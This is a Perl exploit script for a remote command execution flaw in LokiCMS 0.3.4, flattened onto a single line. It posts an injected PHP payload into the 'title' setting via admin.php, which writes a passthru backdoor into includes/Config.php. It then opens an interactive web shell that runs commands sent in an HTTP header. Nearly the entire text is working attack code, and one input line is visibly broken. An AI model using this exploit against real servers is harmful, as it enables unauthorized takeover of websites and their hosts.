# Author: __GiReX__ # Homepage: http://girex.altervista.org # CMS: LokiCMS 0.3.4 # URL: http://www.lokicms.com/ # Description: LokiCMS is still vulnerable to Remote Command Execution (see: http://milw0rm.com/exploits/5408) # The exploit changed becouse the vars changed but the bugged function is the same: writeconfig() # LokiCMS does not check the access to admin.php via POST... #!/usr/bin/perl -w # LokiCMS <= 0.3.4 Remote Command Execution Exploit # Needs with magic_quotes_gpc = Off # Coded by __GiReX__ use LWP::UserAgent; if(not defined $ARGV[0]) { banner(); print "[-] Usage: perl $0 [host] [path]\n"; print "[-] Example: perl $0 localhost /lokicms/\n\n"; exit; } my $lwp = new LWP::UserAgent or die; my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; $target .= $ARGV[1] unless not defined $ARGV[1]; $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/; banner(); my $res = $lwp->post($target.'admin.php', [ 'LokiACTION' => 'A_SAVE_G_SETTINGS', 'title' => "';echo \"\";if(strlen(\$_SERVER['HTTP_CMD']))". "passthru(\$_SERVER['HTTP_CMD']);//", 'language' => 'english-utf-8', 'theme' => 'default' ]); if($res->is_error) { print "[-] Request mistake. Exploit terminated!\n"; exit (); } while(1) { print "[+] shell:~\$ "; chomp($cmd = ); last if $cmd eq 'exit'; $lwp->default_header( 'CMD' => $cmd ); my $res = $lwp->get($target.'includes/Config.php'); if($res->is_success and $res->content =~ /INFECTED/) { print "\n". substr($res->content, index($res->content, 'INFECTED') + 12)."\n"; } else { print "[-] PHP Code not injected. maybe magic_quotes_gpc = On!\n"; last; } } sub banner { print "[+] LokiCMS 0.3.4 Remote Command Execution Exploit\n"; print "[+] Coded by __GiReX__\n"; print "\n"; }